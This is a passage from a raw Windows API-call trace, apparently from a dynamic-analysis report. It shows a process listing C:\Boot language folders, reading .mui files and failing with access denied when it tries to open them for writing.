nFileSizeHigh=0x0, nFileSizeLow=0xb5a0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0082.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0082.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0082.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0082.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0082.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0082.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0082.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0082.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0082.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0082.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0082.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0082.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0082.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0082.803] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.803] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.803] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.803] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0082.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.803] AreFileApisANSI () returned 1 [0082.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\el-GR\\memtest.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\el-GR\\memtest.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0082.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.803] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.803] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0082.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0082.803] AreFileApisANSI () returned 1 [0082.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0082.803] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53298 [0082.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x53298, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\el-GR\\memtest.exe.mui") returned 30 [0082.803] CreateFileW (lpFileName="C:\\Boot\\el-GR\\memtest.exe.mui" (normalized: "c:\\boot\\el-gr\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0082.804] GetFileType (hFile=0x430) returned 0x1 [0082.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0082.804] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0082.804] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0082.804] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0082.804] CloseHandle (hObject=0x430) returned 1 [0082.804] AreFileApisANSI () returned 1 [0082.924] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0082.924] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x538c8 [0082.924] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x538c8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\el-GR\\memtest.exe.mui") returned 30 [0082.924] CreateFileW (lpFileName="C:\\Boot\\el-GR\\memtest.exe.mui" (normalized: "c:\\boot\\el-gr\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.925] GetLastError () returned 0x5 [0082.925] GetLastError () returned 0x5 [0082.925] SetLastError (dwErrCode=0x5) [0082.925] GetLastError () returned 0x5 [0082.925] SetLastError (dwErrCode=0x5) [0082.925] GetLastError () returned 0x5 [0082.925] SetLastError (dwErrCode=0x5) [0082.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0082.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0082.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0082.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.925] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.925] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.925] FindNextFileW (in: hFindFile=0x78210, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x68d68, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧떠")) returned 0 [0082.925] FindClose (in: hFindFile=0x78210 | out: hFindFile=0x78210) returned 1 [0082.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0082.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0082.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0082.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0082.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0082.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0082.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0082.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45fd8 | out: hHeap=0x20000) returned 1 [0082.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0082.925] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.925] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0082.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0082.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0082.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0082.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0082.926] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.926] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.926] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.926] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.926] AreFileApisANSI () returned 1 [0082.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\en-GB", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\en-GB", lpUsedDefaultChar=0x0) returned 14 [0082.926] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.926] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0082.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0082.926] AreFileApisANSI () returned 1 [0082.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0082.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88680 [0082.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x88680, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\en-GB") returned 14 [0082.926] CreateFileW (lpFileName="C:\\Boot\\en-GB" (normalized: "c:\\boot\\en-gb"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.926] GetLastError () returned 0x5 [0082.926] GetLastError () returned 0x5 [0082.927] SetLastError (dwErrCode=0x5) [0082.927] GetLastError () returned 0x5 [0082.927] SetLastError (dwErrCode=0x5) [0082.927] GetLastError () returned 0x5 [0082.927] SetLastError (dwErrCode=0x5) [0082.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0082.927] AreFileApisANSI () returned 1 [0082.927] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0082.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88658 [0082.927] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x88658, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\en-GB") returned 14 [0082.927] CreateFileW (lpFileName="C:\\Boot\\en-GB" (normalized: "c:\\boot\\en-gb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.927] GetLastError () returned 0x5 [0082.927] GetLastError () returned 0x5 [0082.927] SetLastError (dwErrCode=0x5) [0082.927] GetLastError () returned 0x5 [0082.927] SetLastError (dwErrCode=0x5) [0082.927] GetLastError () returned 0x5 [0082.927] SetLastError (dwErrCode=0x5) [0082.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0082.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0082.927] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.927] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.927] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.927] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0082.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.928] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef57d0f5, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef57d0f5, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="en-US", cAlternateFileName="")) returned 1 [0082.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0082.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0082.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0082.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.928] FindFirstFileExW (in: lpFileName="C:\\Boot\\en-GB\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78690 [0082.928] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc482dc87, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc482dc87, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0082.928] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc482dc87, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12158, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0082.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0082.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0082.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0082.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0082.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0082.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0082.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0082.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45e88 [0082.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0082.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0082.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0082.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0082.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0082.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0082.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0082.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0082.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0082.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0082.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0082.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0082.929] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.929] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.929] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.929] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0082.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0082.929] AreFileApisANSI () returned 1 [0082.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\en-GB\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\en-GB\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0082.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0082.929] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.929] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0082.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0082.929] AreFileApisANSI () returned 1 [0082.930] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0082.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53838 [0082.931] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x53838, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\en-GB\\bootmgr.exe.mui") returned 30 [0082.931] CreateFileW (lpFileName="C:\\Boot\\en-GB\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-gb\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0082.931] GetFileType (hFile=0x430) returned 0x1 [0082.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0082.931] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0082.931] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0082.931] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0082.931] CloseHandle (hObject=0x430) returned 1 [0082.932] AreFileApisANSI () returned 1 [0082.932] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0082.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53838 [0082.932] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x53838, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\en-GB\\bootmgr.exe.mui") returned 30 [0082.932] CreateFileW (lpFileName="C:\\Boot\\en-GB\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-gb\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.932] GetLastError () returned 0x5 [0082.932] GetLastError () returned 0x5 [0082.932] SetLastError (dwErrCode=0x5) [0082.932] GetLastError () returned 0x5 [0082.932] SetLastError (dwErrCode=0x5) [0082.932] GetLastError () returned 0x5 [0082.932] SetLastError (dwErrCode=0x5) [0082.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0082.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0082.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.932] HeapFree (in: 